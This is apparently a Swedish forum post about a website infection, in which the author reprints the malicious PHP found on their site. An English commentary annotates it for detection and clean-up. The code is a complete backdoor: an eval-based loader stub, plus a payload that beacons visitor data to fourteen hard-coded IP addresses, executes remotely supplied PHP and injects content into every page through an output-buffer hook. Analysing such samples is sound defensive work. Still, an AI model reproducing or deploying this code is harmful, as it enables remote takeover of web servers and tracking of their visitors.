Min hemsida blev drabbad av liknande kod. Jag är mycket mån om säkerhet och var helt säker på att det inte var i något av mina script. Det visade sig att webbhotellet hade en gammal cPanel-version som hade säkerhetshål.
Rensade upp koden helt och hållet.
PHP-kod:
<?php
/*02650a6c543e9196f2170570283ae32b_on*/
// Loader stub found at the top of the infected file. The real payload is the
// base64-encoded form of the second listing; the forum author replaced it with
// a placeholder here. The paired "_on"/"_off" marker comments (same hex tag on
// both) are a practical grep signature when sweeping a host for this injection.
$evil_code = **NÄSTA KOD RUTA**;
// create_function() compiles a closure from a string, so the decoded payload is
// run through eval() without the literal text "eval(" appearing contiguously in
// the file. NOTE(review): `eval .'(...)'` is not valid PHP as transcribed; it is
// presumably the forum's rendering of the string 'eval(base64_decode($arg1));'.
// create_function() was deprecated in PHP 7.2 and removed in 8.0, so this stub
// only works on older runtimes.
$z = create_function('$arg1', eval .'(base64_decode($arg1));');
$z($evil_code); // Runs the code from the next box
/*02650a6c543e9196f2170570283ae32b_off*/
?>
$evil_code, det är detta som körs och är det viktiga. Allt annat är bara för att dölja denna bit kod.
PHP-kod:
<?php
if (!function_exists("GetMama")) {
// Beacons to the remote host $pa with details of the current request and the
// infected file, then acts on the reply:
//   - a reply containing the marker "eval" is executed with eval() and the
//     script exits (remote code execution controlled by the operator);
//   - a reply containing the marker "ebna" is stored in $_SERVER["good"] for
//     mod_con() to inject into the page, and true is returned;
//   - anything else returns false so gogo() tries the next host.
// For detection: the outbound GET to "/jedi.php?version=0997&mother=..." on
// port 80, with the infected file's path, visitor IP, referrer, user agent and
// query string as parameters, is the network indicator of this infection.
function ahfudflfzdhfhs($pa) {
// "mother" tag sent to the remote host; GetMama() below returns "sedom".
$mama = GetMama();
// Absolute path of the infected file is reported back — the remote side learns
// exactly where the payload lives.
$file = urlencode(__FILE__);
if(isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else{
$host = "";
}
if(isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else{
$ip = "";
}
if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {
$ref = "";
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
// User agent is lowercased before being sent; the remote side presumably
// uses it to decide what content (if any) to return for this visitor.
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
} else {
$ua = "";
}
if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {
$qs = "";
}
// Plain HTTP to a bare IP address (see the list in gogo()).
$url_0 = "http://" . $pa;
$url_1 = "/jedi.php?version=0997&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
// Three transports are tried in order — cURL, then file_get_contents() when
// allow_url_fopen is on, then a raw socket — so disabling one of them is not
// enough to stop the beacon.
$try = true;
if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// 3-second timeout keeps the page from stalling noticeably if the host is down.
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get("allow_url_fopen")) && $try) {
// "@" hides the warning that an unreachable host would otherwise log.
$ult = trim(@file_get_contents($url_0 . $url_1));
$try = false;
}
if($try){
// Hand-rolled HTTP/1.0 GET over a plain socket, 30-second connect timeout.
$fp = fsockopen($pa, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";
$out .= "Host: $pa\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {
$ret .= fgets($fp, 128);
}
fclose($fp);
// Drop the response headers: everything after the first blank line is the body.
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
// Remote code execution path: the marker word is removed and the remainder of
// the reply is executed as PHP, then the request is terminated.
if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult));
eval($z);
exit();
}
// Injection path: the reply minus the marker is parked in the $_SERVER
// superglobal (used here as a global scratch slot) for mod_con() to splice
// into the HTML.
if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);
return true;
} else {
return false;
}
}
// Iterates over the hard-coded list of control hosts in random order and
// stops at the first one whose reply ahfudflfzdhfhs() accepts (returns true).
// Falls through with an implicit null if none of them answers usefully.
// The fourteen IP addresses below are the contact list for this sample and
// belong in an egress block list / firewall log search when cleaning up.
function gogo(){
$father2[] = "77.81.241.253";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "31.184.234.96";
$father2[] = "77.95.18.189";
$father2[] = "93.170.137.22";
$father2[] = "188.40.95.244";
$father2[] = "199.115.231.58";
$father2[] = "82.192.87.178";
$father2[] = "216.246.99.215";
$father2[] = "95.211.18.79";
// Random order spreads load across the hosts and makes the contacted address
// vary between requests, so a single blocked IP does not disable the beacon.
shuffle($father2);
foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
return true;
}
}
}
// Splices the remotely supplied content ($_SERVER["good"], set by
// ahfudflfzdhfhs()) into an HTML page: directly after "<body>" if that tag
// occurs exactly once, otherwise directly before "</body>" if that occurs
// exactly once. Pages with neither (or with several) are returned untouched,
// which is why the injected markup is typically only seen in "normal" pages.
function mod_con($buf){
// No-op replacement used only for its 4th argument: the case-insensitive
// occurrence count of "<body>".
str_ireplace("<body>","<body>",$buf,$cnt_h);
if ($cnt_h == 1) {
// gogo() fills $_SERVER["good"] (only on a successful "ebna" reply).
gogo();
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
return $buf;
}
// Same counting trick for the closing tag.
str_ireplace("</body>","</body>",$buf,$cnt_h);
if ($cnt_h == 1) {
gogo();
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
return $buf;
}
return $buf;
}
// Output-buffer callback (registered with ob_start() below): every byte the
// page sends passes through here, which is how the injection reaches pages
// that never reference this file explicitly. Gzip-compressed output is
// decompressed, modified and recompressed so the injection also survives
// zlib/ob_gzhandler output compression.
function opanki($buf){
$gz_e = false;
$h_l = headers_list();
// Detect compressed output by the header already queued for this response.
if (in_array("Content-Encoding: gzip", $h_l)){
$gz_e = true;
}
if ($gz_e){
// Round-trips the buffer through a short-lived file under /tmp prefixed
// "FOO" so gzread() can decompress it; the file is unlinked right after, so
// it rarely survives for forensics but may show up in file-access auditing.
$tmpfname = tempnam("/tmp", "FOO");
$zf = fopen($tmpfname, "w");
fputs($zf, $buf);
fclose($zf);
$zd = gzopen($tmpfname, "r");
// Reads at most 10,000,000 decompressed bytes in one call.
$contents = gzread($zd, 10000000);
$contents = mod_con($contents);
gzclose($zd);
unlink($tmpfname);
$contents = gzencode($contents);
} else {
$contents = mod_con($buf);
}
// Content-Length is rewritten to match the modified body, so the injected
// bytes do not cause a truncated or over-long response.
$len = strlen($contents);
header("Content-Length: ".$len);
return($contents);
}
// Returns the fixed campaign tag "sedom" that is sent as the "mother"
// parameter of the beacon; its existence is also the guard used on the
// enclosing if() so the payload is only defined once per request.
function GetMama(){
$mother = "sedom";
return $mother;
}
// Registers opanki() as the output-buffer handler for the rest of the request,
// so every page rendered after this file is included is passed through the
// injector. Searching the codebase for ob_start() callbacks with unfamiliar
// names is a quick way to spot this family of infection.
ob_start("opanki");
}